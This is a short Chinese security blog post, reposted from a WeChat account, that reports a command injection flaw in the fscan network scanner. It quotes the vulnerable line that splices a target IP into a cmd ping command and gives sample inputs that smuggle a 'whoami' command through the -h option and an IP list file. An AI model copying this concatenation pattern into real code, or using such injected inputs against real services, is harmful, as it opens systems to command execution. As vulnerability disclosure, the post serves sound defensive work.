fscan存在命令注入漏洞[doge][doge]

2024年12月16日19:56:39评论8 views字数 427阅读1分25秒阅读模式

一个国外的哥们在fscan项目提了个issue。大概说的是fscan存在一个命令注入的漏洞。存在漏洞的代码如下

# Vulnerable way to build commandcommand = exec.Command("cmd", "/c", "ping -n 1 -w 1 "+ip+" && echo true || echo false")

这段代码之间拼接了ping命令和IP，因此可以达到命令注入的目的。

fscan提供两种输入目标的方式，-h 和 -hf。

单个IP如下

./fscan -h "127.0.0.1; whoami > test.txt" -m icmp

IP文件如下

ips.txt

127.0.0.1;whoami>test.txt

命令执行

./fscan -hf ips.txt -m icmp

不过都能运行fscan了，为什么还要命令注入呢。如果有人二开fscan，提供了web远程扫描的功能，这种存在威胁。

原文始发于微信公众号（小肥羊安全）：fscan存在命令注入漏洞[doge][doge]

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

Clash Verge rev提权与命令执行分析

本文由 admin 发表于 2024年12月16日19:56:39
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
fscan存在命令注入漏洞[doge][doge]https://cn-sec.com/archives/3515263.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.